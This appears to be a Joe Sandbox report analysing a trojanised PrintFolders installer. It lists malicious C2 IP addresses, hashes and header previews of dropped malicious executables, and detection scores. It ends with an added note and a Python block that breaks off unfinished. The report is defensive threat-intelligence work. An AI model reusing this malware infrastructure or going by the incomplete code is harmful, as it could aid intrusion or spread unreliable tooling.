                http://www.remobjects.com/?ps | file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
                http://www.innosetup.com | file.exe | false | URL Reputation: safe | unknown
                http://www.innosetup.comDVarFileInfo$ | file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000002.395161258.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr | false | Avira URL Cloud: safe | low
                http://www.remobjects.com/?psU | file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr | false | URL Reputation: safe | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                45.139.105.171 | unknown | Italy | 33657 | CMCSUS | true
                45.139.105.1 | unknown | Italy | 33657 | CMCSUS | true
                85.31.46.167 | unknown | Germany | 43659 | CLOUDCOMPUTINGDE | true
                107.182.129.235 | unknown | Reserved | 11070 | META-ASUS | true
                171.22.30.106 | unknown | Germany | 33657 | CMCSUS | true
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:764043
                Start date and time:2022-12-09 11:01:11 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 6s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal96.troj.evad.winEXE@12/23@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 41.9% (good quality ratio 41%)
                • Quality average: 85.5%
                • Quality standard deviation: 22.8%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • TCP Packets have been reduced to 100
                • Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                11:02:14 | API Interceptor | 1x Sleep call for process: karcA17.exe modified
                No context
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:MS Windows HtmlHelp Data
                Category:dropped
                Size (bytes):118869
                Entropy (8bit):7.933172616287708
                Encrypted:false
                SSDEEP:1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
                MD5:204A5BF160646F9A55ED70AB6E1A07A6
                SHA1:5404AB219FA01C270ADC36303D447109503C4A4D
                SHA-256:CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
                SHA-512:6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
                Malicious:false
                Reputation:moderate, very likely benign file
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):5403
                Entropy (8bit):4.918324842676727
                Encrypted:false
                SSDEEP:96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
                MD5:C8B211D81EB7D4F9EBB071A117444D51
                SHA1:43BF57BB0931EBED953FE17F937C1C7FF58A027C
                SHA-256:AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
                SHA-512:C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
                Malicious:false
                Preview:=====================.. History of Releases..=====================....Legend..------..[+] - added..[*] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[*] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[*] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[*] Faster processing of large numbers of files..[*] Folders containing no files acc
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:RAGE Package Format (RPF),
                Category:dropped
                Size (bytes):3391
                Entropy (8bit):4.812121234949207
                Encrypted:false
                SSDEEP:96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
                MD5:A5E8094B0CBADE929AEE07F5DA5E9429
                SHA1:60BB56A380CD9126AC067AE39B262E28A22532CD
                SHA-256:F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
                SHA-512:018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
                Malicious:false
                Preview:PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):21504
                Entropy (8bit):4.508743257769972
                Encrypted:false
                SSDEEP:192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
                MD5:4FB606EDBDE8EFB6D34E6E1BC5F677F1
                SHA1:F8F094064D107384E619DED1139932AA38476272
                SHA-256:A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
                SHA-512:5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:data
                Category:dropped
                Size (bytes):3602504
                Entropy (8bit):5.8368779870150345
                Encrypted:false
                SSDEEP:98304:Z3O+M+AbmcsW7AfGFVXgMUP31PkZtXEknL1K:sKgaUK
                MD5:9DF53593153D2E4306BBD631651FAAA5
                SHA1:1D5BDD8D616DA78DE7873CA5F677AE278A456F52
                SHA-256:F56698F56D213A36ACA4D618A7E8D99F8C9D0EA7F35EEA06BBDF5C5B59BFA779
                SHA-512:656E2E7A9B7D6C19DDFEA437FE0866D649DB784081403945A8651B887773073649B73295E468509A6CF1DFC5D1E7D0F787F77A468678F244B4BCAE93FBC0CE42
                Malicious:false
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:MS Windows HtmlHelp Data
                Category:dropped
                Size (bytes):118869
                Entropy (8bit):7.933172616287708
                Encrypted:false
                SSDEEP:1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
                MD5:204A5BF160646F9A55ED70AB6E1A07A6
                SHA1:5404AB219FA01C270ADC36303D447109503C4A4D
                SHA-256:CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
                SHA-512:6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
                Malicious:false
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:RAGE Package Format (RPF),
                Category:dropped
                Size (bytes):3391
                Entropy (8bit):4.812121234949207
                Encrypted:false
                SSDEEP:96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
                MD5:A5E8094B0CBADE929AEE07F5DA5E9429
                SHA1:60BB56A380CD9126AC067AE39B262E28A22532CD
                SHA-256:F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
                SHA-512:018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
                Malicious:false
                Preview:PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):714506
                Entropy (8bit):6.488639273564823
                Encrypted:false
                SSDEEP:12288:Ih5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOZ:q5NoqWolrP837JzHvA6yknyWFxvVxOZ
                MD5:F82EF8A460249A7A71B8DA396C651027
                SHA1:1BA036C9860EB581550998DA24980CC63CD7E2C9
                SHA-256:B7B477D0DE6348FAEA68869B86782B2859AC302A0DFE5C91B94CE65CFAD31218
                SHA-512:F331C2149313896A37AD0F268EB83EFF75B1A65EE1372185F02558F49BB4E0DE2BF9565D93DEF6A0009D37A2CDC297CC14108629CDBE168FDDA202470BEBE31A
                Malicious:true
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):21504
                Entropy (8bit):4.508743257769972
                Encrypted:false
                SSDEEP:192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
                MD5:4FB606EDBDE8EFB6D34E6E1BC5F677F1
                SHA1:F8F094064D107384E619DED1139932AA38476272
                SHA-256:A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
                SHA-512:5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):5403
                Entropy (8bit):4.918324842676727
                Encrypted:false
                SSDEEP:96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
                MD5:C8B211D81EB7D4F9EBB071A117444D51
                SHA1:43BF57BB0931EBED953FE17F937C1C7FF58A027C
                SHA-256:AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
                SHA-512:C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
                Malicious:false
                Preview:=====================.. History of Releases..=====================....Legend..------..[+] - added..[*] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[*] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[*] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[*] Faster processing of large numbers of files..[*] Folders containing no files acc
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:modified
                Size (bytes):3602504
                Entropy (8bit):5.836878591136461
                Encrypted:false
                SSDEEP:98304:I3O+M+AbmcsW7AfGFVXgMUP31PkZtXEknL1K:BKgaUK
                MD5:D9A39F6C4EEDC8F1B89E30D35012D6B4
                SHA1:6B995728348DA6F3D77F9D30D8D698C8D9DC58A6
                SHA-256:6ADB7A807679CDB8B473A987BB42253EE9C64D5ED137F58C8E99B1E5314C8607
                SHA-512:3C19F677A2BE3D6E75583D655A3C09DA2F5659A58E17F0A60BB29A1CBB4CBF83B779925103D5F663D1E20C6E6BD23CF7715DA3D226AA07ACA30E4D233EA1458E
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..........B..........P....................@...................................7..............................................`...............................................................................................................text..."........................... ..`.rdata...6.......@..................@..@.data...0....@.......@..............@....tls.........P.......P..............@....rsrc........`.......`..............@..@.aud104...+..P..H.+..P..............`...................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:InnoSetup Log PrintFolders {3C248D7A-78F2-476F-86FF-34610A9B2E85}, version 0x2a, 3804 bytes, 320366\user, "C:\Program Files (x86)\PrintFolders"
                Category:dropped
                Size (bytes):3804
                Entropy (8bit):4.497837488733423
                Encrypted:false
                SSDEEP:48:zX8myMHLBv8iD86plmlDFoIN0hqkLVO3471qVToa0zA47bJMuGT:Brp8iD86p4lJoIyhqYOIh0XF
                MD5:02B48BE9B78F86E1872D2FD95908AE0B
                SHA1:C72A4E9BBAA57A03ECF5DD74925394E45F791C47
                SHA-256:DE199B6A2F5065AD731A6BD5C9D80050791BA78BCD6963B758FD13FBF647CA84
                SHA-512:68458F599618DB47A15EC15E6537863A980E3443024BD61F649E85FE37A8D4571FB989453B20CCE2384021666EA5876E275E9874172A0A403ACEB7B6232C3950
                Malicious:false
                Preview:Inno Setup Uninstall Log (b)....................................{3C248D7A-78F2-476F-86FF-34610A9B2E85}}.........................................................................................PrintFolders....................................................................................................................*...........%.................................................................................................................u........n:........C....320366.user#C:\Program Files (x86)\PrintFolders.................. ..........Q.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMet
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):714506
                Entropy (8bit):6.488639273564823
                Encrypted:false
                SSDEEP:12288:Ih5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOZ:q5NoqWolrP837JzHvA6yknyWFxvVxOZ
                MD5:F82EF8A460249A7A71B8DA396C651027
                SHA1:1BA036C9860EB581550998DA24980CC63CD7E2C9
                SHA-256:B7B477D0DE6348FAEA68869B86782B2859AC302A0DFE5C91B94CE65CFAD31218
                SHA-512:F331C2149313896A37AD0F268EB83EFF75B1A65EE1372185F02558F49BB4E0DE2BF9565D93DEF6A0009D37A2CDC297CC14108629CDBE168FDDA202470BEBE31A
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:data
                Category:dropped
                Size (bytes):94224
                Entropy (8bit):7.998072640845361
                Encrypted:true
                SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                MD5:418619EA97671304AF80EC60F5A50B62
                SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                Malicious:false
                Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):17
                Entropy (8bit):3.1751231351134614
                Encrypted:false
                SSDEEP:3:nCmxEl:Cmc
                MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                Malicious:false
                Preview:UwUoooIIrwgh24uuU
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):704000
                Entropy (8bit):6.478833170287182
                Encrypted:false
                SSDEEP:12288:gh5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOM:y5NoqWolrP837JzHvA6yknyWFxvVxOM
                MD5:2C3832FDF847813369EC960CD39C8265
                SHA1:35B24C0B451E987C1E2B07B670A65FBCB02B118C
                SHA-256:2820D4BDBD9CAB3EEE82C86B11CFB2B8EC55247BCB975331078ECD182C1471B2
                SHA-512:408A642264E967AAA78CC7B58529AAA152BA85AF12A4DC7DBA0A82E560E08299031CB45D8DE78E5FA26F03FC6DB863344AAA68E010F7DDDA4FC29501365D986A
                Malicious:true
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2560
                Entropy (8bit):2.8818118453929262
                Encrypted:false
                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                MD5:A69559718AB506675E907FE49DEB71E9
                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 2%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.226829458093667
                Encrypted:false
                SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):23312
                Entropy (8bit):4.596242908851566
                Encrypted:false
                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 2%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):6.20389308045717
                Encrypted:false
                SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                MD5:3FB36CB0B7172E5298D2992D42984D06
                SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
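The per-file fields in the dropped-file listing above (size, MD5/SHA-1/SHA-256, 8-bit entropy, the Encrypted flag) can be reproduced offline. The block below is an added example, not Joe Sandbox's code or part of this report; the sample inputs are constructed from the two dropped files whose full contents the report shows (the 1-byte file "0" and the 17-byte file "UwUoooIIrwgh24uuU"), plus a constructed pseudo-random blob standing in for the 94224-byte "Encrypted:true" file. The 7.9 bits/byte threshold is an assumption; the report does not state the rule the sandbox uses for its Encrypted flag.

```python
"""Added example: reproduce a sandbox dropped-file triage record
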